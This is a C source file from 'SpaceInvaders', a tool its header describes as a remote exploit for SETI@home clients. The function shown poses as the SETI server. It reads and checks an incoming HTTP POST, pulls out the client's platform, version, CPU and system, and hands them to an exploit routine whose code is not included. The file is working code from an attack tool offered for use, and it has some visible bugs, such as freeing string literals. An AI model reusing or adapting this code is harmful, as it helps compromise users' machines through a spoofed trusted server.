/*-----------------------------------------------------------------------------
  This file is part of SpaceInvaders, a remote exploit for SETI@home clients.
  Copyright 2002, 2003 Berend-Jan Wever.
    <skylined@edup.tudelft.nl>
    http://spoor12.edup.tudelft.nl

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.

------------------------------------------------------------------------------*/

#include "connectionhandler.h"

//-- Functions ----------------------------------------------------------------
int handle_connection(int client_handle) {
  char      buffer[MAX_BUFFER_SIZE];
  int       bufferlength;

  int       headerlength;
  int       bodylength;
  int       exploitlength;

  char*     post_id = "POST";
  char*     host_id = "shserver2.ssl.berkeley.edu";
  char*     end_of_header_id = "\x0d\x0a\x0d\x0a";

  char*     platform = NULL;
  int       mayor_version;
  int       minor_version;
  char*     operation = NULL;
  char*     cpu_type = NULL;
  char*     system = NULL;

  char*     temp = NULL;
  int       success;

  //---------------------------------------------------------------------------
  fprintf(stdout, "Read header...   ");fflush(stdout);
  headerlength = 0;
  bzero(buffer, MAX_BUFFER_SIZE);
  do {
    if (headerlength == MAX_BUFFER_SIZE) {
      fprintf(stdout, "\rRead header...   failed! (read %d (0x%x) bytes, "
          "header is too large)", headerlength, headerlength); fflush(stdout);
      return 0;
    }

    fprintf(stdout, "\rRead header...   (read %d (0x%x) bytes)",
                                  headerlength, headerlength); fflush(stdout);

    if (read(client_handle, buffer+headerlength, 1) != 1) {
      fprintf(stdout, "failed!\n"); fflush(stdout);
      return 0;
    }
    headerlength++;
  } while (strstr(buffer, end_of_header_id) == NULL);
  fprintf(stdout, "\rRead header...   ok. (header length: %d (0x%x) bytes)\n",
                                  headerlength, headerlength); fflush(stdout);

  //---------------------------------------------------------------------------
  fprintf(stdout, "Handle header... ");fflush(stdout);
  if (!strncmp(buffer, post_id, strlen(post_id)) == 0) {
    fprintf(stdout, "failed! (This is not a HTTP POST)\n");
    fflush(stdout);
    return 0;
  }
  if ((temp = getsetting(buffer, "Host: ")) == NULL) {
    fprintf(stdout, "failed! ('Host: ' not found in header)\n");
    fflush(stdout);
    return 0;
  }
  if (!strstr(temp, host_id) != 0) {
    fprintf(stdout, "failed! ('Host: %s' is not seti)\n", temp);
    fflush(stdout);
    free(temp);
    return 0;
  }
  free(temp);
  if ((temp = getsetting(buffer, "Content-Length: ")) == NULL) {
    fprintf(stdout, "failed! ('Content-Length: ' not found in header)\n");
    fflush(stdout);
    return;
  }
  bodylength = atoi(temp);

  if (bodylength < 1) {
    fprintf(stdout, "failed! ('Content-Length: %s' in header is illegal)\n",
                                                        temp); fflush(stdout);
    free(temp);
    return 0;
  }

  if (bodylength > MAX_BUFFER_SIZE-1) {
    fprintf(stdout, "failed! ('Content-Length: %s' too big, %d (0x%x) "
                "bytes max)\n", temp, bodylength, bodylength); fflush(stdout);
    free(temp);
    return 0;
  }
  free(temp);

  fprintf(stdout, "ok. (body length: %d (0x%x) bytes)\n", bodylength,
                                                  bodylength); fflush(stdout);

  //---------------------------------------------------------------------------
  fprintf(stdout, "Read body...     ");fflush(stdout);
  bufferlength = 0;
  while (bufferlength < bodylength) {
    fprintf(stdout, "\rRead body...     (%d/%d (0x%x/0x%x) bytes)",
          bufferlength, bodylength, bufferlength, bodylength); fflush(stdout);
    if (read(client_handle, buffer+bufferlength, 1) != 1) {
      fprintf(stdout, "\rRead body...     failed! (%d/%d (0x%x/0x%x) bytes "
               "read)\n", bufferlength, bodylength, bufferlength, bodylength);
      fflush(stdout);
      return 0;
    }
    bufferlength++;
  }

  buffer[bufferlength] = '\0';
  fprintf(stdout, "\rRead body...     ok. (%d (0x%x) bytes read)         "
                    "            \n", bodylength, bodylength); fflush(stdout);
  
  //---------------------------------------------------------------------------
  fprintf(stdout, "Handle body...   ");fflush(stdout);
  if ((platform = getsetting(buffer, "platform=")) == NULL) {
    fprintf(stdout, "failed! (no 'platform')\n"); fflush(stdout);
    return 0;
  }
  if ((temp = getsetting(buffer, "major_version=")) == NULL) {
    free(platform);
    fprintf(stdout, "failed! (no 'mayor_version')\n"); fflush(stdout);
    return 0;
  }
  mayor_version = atoi(temp);
  free(temp);

  if ((temp = getsetting(buffer, "minor_version=")) == NULL) {
    free(platform);
    fprintf(stdout, "failed! (no 'minor_version')\n"); fflush(stdout);
    return 0;
  }
  minor_version = atoi(temp);
  free(temp);
  fprintf(stdout, "ok.\n");

  //---------------------------------------------------------------------------
  if ((operation = getsetting(buffer, "operation=")) == NULL) {
    operation = "<unknown>";
  }
  if ((cpu_type = getsetting(buffer, "cpu_type=")) == NULL) {
    cpu_type = "<unknown>";
  }
  if ((system = getsetting(buffer, "system=")) == NULL) {
    system = "<unknown>";
  }
  fprintf(stdout, "  Operation:         %s\n", operation);
  fprintf(stdout, "  Platform/version:  %s v%d.%02d\n",
                                     platform, mayor_version, minor_version);
  fprintf(stdout, "  System/CPU type:   %s/%s\n", system, cpu_type);
  fflush(stdout);

  //---------------------------------------------------------------------------
  success = exploit(client_handle, platform, mayor_version, minor_version,
                                                 operation, system, cpu_type);

  //---------------------------------------------------------------------------
  free(platform);
  free(operation);
  free(system);
  free(cpu_type);
  return success;
}
